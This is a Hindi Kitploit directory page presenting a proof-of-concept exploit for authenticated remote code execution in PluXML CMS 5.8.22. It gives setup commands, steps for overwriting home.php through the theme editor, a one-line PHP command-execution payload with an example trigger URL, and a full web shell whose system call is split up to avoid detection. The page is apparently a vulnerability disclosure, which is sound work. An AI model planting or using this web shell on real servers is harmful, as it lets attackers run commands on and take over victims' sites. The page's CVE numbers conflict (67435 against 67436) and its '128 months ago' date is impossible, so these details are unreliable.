Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-67435 — PluXML CMS संस्करण 5.8.22 में एक महत्वपूर्ण रिमोट कोड निष्पादन (RCE) भेद्यता की पहचान की गई है। यह भेद्यता प्रमाणित व्यवस्थापकों को थीम संपादक कार्यक्षमता के माध्यम से दुर्भावनापूर्ण PHP वेब शेल अपलोड करके वेब सर्वर पर मनमाना PHP कोड निष्पादित करने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/rajchowdhury240/cve-2025-67435
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubrajchowdhury240/cve-2025-67435

CVE-2025-67435

PluXML CMS संस्करण 5.8.22 में एक महत्वपूर्ण रिमोट कोड निष्पादन (RCE) भेद्यता की पहचान की गई है। यह भेद्यता प्रमाणित व्यवस्थापकों को थीम संपादक कार्यक्षमता के माध्यम से दुर्भावनापूर्ण PHP वेब शेल अपलोड करके वेब सर्वर पर मनमाना PHP कोड निष्पादित करने की अनुमति देती है।

रिपॉजिटरी देखें
128 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-67436

PluXml CMS 5.8.22 में प्रमाणित रिमोट कोड निष्पादन (RCE)

शोधकर्ता : Chowdhury Faizal Ahammed

स्थापना

root@kitploit:~
git clone https://github.com/pluxml/PluXml.git
cd PluXml
ddev config --project-type=php --php-version=8.1 --docroot=.
ddev start
image image image image image

प्रमाण की अवधारणा

चरण-दर-चरण शोषण

प्रमाणीकरण: मान्य प्रशासक क्रेडेंशियल के साथ PluXML प्रशासक पैनल में लॉग इन करें थीम संपादक पर जाएं:

प्रशासन डैशबोर्ड तक पहुंचें यहां जाएं: Themes → Home.php → Edit image

दुर्भावनापूर्ण पेलोड इंजेक्ट करें:

  • home.php में मौजूदा सामग्री को PHP वेब शेल से बदलें

  • उदाहरण पेलोड: <?php system($_GET['cmd']); ?>

  • संशोधित फ़ाइल को सहेजें

निष्पादन ट्रिगर करें:

वेबसाइट के मुख्य होम पेज पर जाएं इंजेक्ट किया गया PHP कोड वेब सर्वर विशेषाधिकारों के साथ निष्पादित होता है

  • रिमोट कमांड इस प्रकार निष्पादित किए जा सकते हैं: http://target.com/?cmd=whoami

रिवर्स शेल

image

वेबशेल का पेलोड

root@kitploit:~
<html>
  <body>
    <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
      <input
        type="TEXT"
        name="cmd"
        autofocus
        id="cmd"
        size="80"
      >
      <input
        type="SUBMIT"
        value="Execute"
      >
    </form>

    <pre>
<?php
if (isset($_GET['cmd'])) {
    $func_name = "sys" . "tem";
    $func_name($_GET['cmd']);
}
?>
    </pre>
  </body>
</html>
image
image

संदर्भ

  • CVE-2025-67436: https://nvd.nist.gov/vuln/detail/CVE-2025-67436
  • PluXML आधिकारिक वेबसाइट: https://www.pluxml.org/
  • PluXML GitHub भंडार: https://github.com/pluxml/PluXml
  • OWASP शीर्ष 10 - A03:2021 इंजेक्शन: https://owasp.org/Top10/A03_2021-Injection/
टूल डाउनलोड करें